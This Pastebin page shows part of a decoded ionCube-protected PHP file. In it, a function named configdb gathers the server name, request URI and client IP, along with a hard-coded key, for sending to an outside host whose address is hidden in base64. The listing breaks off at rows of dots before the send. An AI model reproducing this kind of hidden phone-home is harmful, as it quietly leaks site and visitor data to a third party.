Advertisement
Guest User

Untitled

a guest
Jun 22nd, 2013
67
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.41 KB | None | 0 0
  1. <?php
  2. /**
  3. *
  4. * @ This file is created by deZender.Net
  5. * @ deZender (PHP5 Decoder for ionCube Encoder)
  6. *
  7. * @ Version : 1.1.6.0
  8. * @ Author : DeZender
  9. * @ Release on : 02.06.2013
  10. * @ Official site : http://DeZender.Net
  11. *
  12. */
  13.  
  14. function __autoload($class_name) {
  15. $file_name = trim( str_replace( '_', '/', $class_name ), '/' ) . '.class.php';
  16. $file_path = DIR_LIBARAY . '/' . $file_name;
  17.  
  18. if (file_exists( $file_path )) {
  19. return require_once( $file_path );
  20. }
  21.  
  22. $file_path = DIR_CLASSES . '/' . $file_name;
  23.  
  24. if (file_exists( $file_path )) {
  25. return require_once( $file_path );
  26. }
  27.  
  28. return false;
  29. }
  30.  
  31. function import($funcpre) {
  32. $file_path = DIR_FUNCTION . '/' . $funcpre . '.php';
  33.  
  34. if (file_exists( $file_path )) {
  35. require_once( $file_path );
  36. }
  37.  
  38. }
  39.  
  40. function countryCityFromIP($ipAddr) {
  41. }
  42.  
  43. function configdb($key = 'f8WE45Y^', $cpur = '', $version = '') {
  44. $post_data['duse'] = $_SERVER['SERVER_NAME'];
  45. $post_data['whouse'] = $_SERVER['SERVER_NAME'] . ':' . $_SERVER['SERVER_PORT'] . $_SERVER['REQUEST_URI'];
  46. $post_data['whereuse'] = getRealIpAdd( ) . '(' . getRealIpTyp( ) . ')';
  47. $post_data['key'] = $key;
  48.  
  49. if (!$cpur) {
  50. $cpur = 'aHR0cDovL3d3dy53ZWJpbm9jLmNvbS9jYXB0YS9hcGkucGhw';
  51. }
  52. .............................................................................................
  53. ...............................................
  54. ..................
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement